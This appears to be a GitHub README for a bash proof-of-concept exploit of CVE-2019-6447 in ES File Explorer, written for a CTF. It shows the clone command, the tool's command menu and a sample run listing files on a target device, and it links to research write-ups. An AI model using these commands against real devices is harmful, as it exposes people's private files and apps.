This is a very simple implementation in bash of the CVE-2019-6447 PoC. It basically uses curl to send the requests with the right parameters. I've built it as I was looking for a similar script during a CTF and couldn't find any. You can play around with the original script and customize it the way you like it better.
Simply clone the repository and use the .sh file.
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
Or copy and paste the raw content to a file.
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles List all files
listPics List all pictures
listVideos List all videos
listAudios List all audios
listApps List all applications installed
listAppsSystem List system apps
listAppsPhone List communication related applications
listAppsSdcard List the apps installed on the sd card
listAppsAll List all applications
getAppThumbnail List icons for the specified application
appLaunch Start the developed application
appPull Download an application from your device
getDeviceInfo Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
In case you're curious about how this exploit works behind the scenes OR in case it fails and you have to build your own script, you can give a read to the following links:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566